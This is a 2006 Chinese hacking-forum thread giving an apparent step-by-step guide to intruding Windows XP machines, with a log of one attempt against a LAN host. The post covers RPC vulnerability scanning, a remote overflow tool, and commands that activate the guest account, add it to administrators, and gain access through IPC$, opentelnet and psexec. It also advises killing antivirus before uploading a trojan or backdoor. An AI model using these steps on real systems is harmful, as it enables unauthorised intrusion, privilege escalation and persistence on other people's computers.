[09-19] 入侵XP系统之初步攻略
入侵XP系统之初步攻略1.思路:突破xp系统远程访问的限制,实现文件传输和远程登陆。
2.工具:rpc漏洞扫描工具、溢出工具,pstools工具包。
3.步骤
1)步骤一:rpc漏洞扫描:
推荐使用retinarpcdcom.exe(eeye公司推出的专门针对RPC漏洞的扫描工具)
2)步骤二:远程溢出:
用xp.exe,溢出成功率极高。
3)步骤三:提升guest权限(本方案之关键):
命令:net user guest /active:yes
net localgroup aministrators guest /add
――――――――――――――――――――――――――――――
如果你用net user guest命令,将会看到下面的内容:
Password required????????????No
这正是突破xp系统远程访问帐号限制的突破口!
除了guest外,其它帐号都是
Password required??????????yes
所以就算你有xp系统的管理员帐号密码一样无所作为。
――――――――――――――――――――――――――――――
当guest提升为admin权限后,试试
dir \IPc$??
呵呵,现在你已经有了读写权限,连ipc$连接都省了~~
当然你也一样可以用net use \ip "" /user:"guest"来进行IPC$连接
到此,文件传输的问题已经解决!
4)步骤四:远程登陆
我们当然不想每次用溢出登陆对方。
那么就试试opentelnet吧
>opentelnet \ip guest "" 1 90
read ntlm failed??????????????????\shit!用administrator也是这样子。
用psexec方便多了,命令如下:
psexec \ip cmd??????
5)注意事项:
千万别在xp系统中建新帐户
xp系统默认只能登陆一个帐户,故用3389的远程登陆是不行的。
rpc溢出会导致对方重启,要慎用,尤其是服务器。
在内网里测试,首先用superscan扫了一个网段。
10.200.6.1――10.200.6.254,看看那些机子开放了 5000端口。
一般情况下这样的机子都是XP系统。好了,速度很快,出来一大片。
然后用RPC的溢出工具,打开,填入一个机子的IP地址,失败,可能已经打了补丁
没关系,继续来,终于有一个成功了
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>
为了保险先安装一个后门,传个文件过去,这个方法很多。
TFTP,FTP,在命令行用脚本或者http下载都可以实现。
这个需要考虑对方有没有开杀毒软件,如果有的话先传个pulist.exe以及pslist.exe过去
先把杀毒软件的服务停止,然后杀掉进程,这时再传木马过去。
好了,我们先看看对方的用户信息
C:WINDOWSsystem32>net user
net user
\ 的用户帐户
-----------------------------------------------------------------
Administrator????????????Guest????????????????????HelpAssistant
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
然后我们把guest激活并加入管理员组。
C:WINDOWSsystem32>net user guest /active:yes
net user guest /active:yes
命令成功完成。
C:WINDOWSsystem32>net localgroup administrators guest /add
net localgroup administrators guest /add
命令成功完成。
我们来看看guest的帐户信息
net user guest
用户名???????????????? Guest
全名
注释?????????????????? 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码???????? 000 (系统默认值)
帐户启用?????????????? Yes
帐户到期?????????????? 从不
上次设置密码?????????? 2003/11/28 下午 02:48
密码到期?????????????? 从不
密码可更改???????????? 2003/11/28 下午 02:48
需要密码?????????????? No
用户可以更改密码?????? No
允许的工作站?????????? All
登录脚本
用户配置文件
主目录
上次登录?????????????? 从不
可允许的登录小时数???? All
本地组成员???????????? *Administrators?????? *Guests
全局组成员???????????? *None
命令成功完成。
看看对方开的共享
C:WINDOWSsystem32>net share
net share
共享名?? 资源????????????????????????注释
------------------------------------------------------------
IPC$???????????????????????????????????????? 远程 IPC
G$?????????? G:???????????????????????????? 默认共享
F$?????????? F:???????????????????????????? 默认共享
ADMIN$?????? C:WINDOWS??????????????????????远程管理
C$?????????? C:???????????????????????????? 默认共享
E$?????????? E:???????????????????????????? 默认共享
命令成功完成。
然后按照文章里的方法进行
C:>dir \10.200.6.183c$
登录失败: 未授予用户在此计算机上的请求登录类型。
C:>net use \10.200.6.183ipc$ "" /user:guest
系统发生 1385 错误。
登录失败: 未授予用户在此计算机上的请求登录类型。
重新在对方的shell里给guest设置了一个密码之后再看看
C:>net use \10.200.6.183ipc$ "123456" /user:guest
系统发生 1385 错误。
登录失败: 未授予用户在此计算机上的请求登录类型。
用psexec \10.200.6.183 cmd.exe 也不行~!!!
因为根本不能建立IPC连接。 坏蛋~~大坏蛋~哈哈~ 好学生值得表扬
什么时候教俺两三招
有时间玩啊……
哈哈
——*流星*—— :Q 拜托,我没记错的话RPC溢出仿佛是好久好久以前的漏洞了耶`````用RPC还不如用最近较流行的MS-06-040漏洞.
hehe
来试一下看看~~~~:victory: 原帖由 jy00952077 于 2006-9-27 20:13 发表拜托,我没记错的话RPC溢出仿佛是好久好久以前的漏洞了耶`````用RPC还不如用最近较流行的MS-06-040漏洞.
不想发表任何言论
[ 本帖最后由 欣云 于 2006-9-27 20:56 编辑 ] 原帖由 欣云 于 2006-9-27 20:25 发表
不想发表任何言论
嗯?为什么不想发表言论? 是哦~~~RPC服务现在的系统都是不可用的,MS还出了补丁呢~~ 在以前"黑客"是一个褒义词来的,有一种精神叫黑客精神
页:
[1]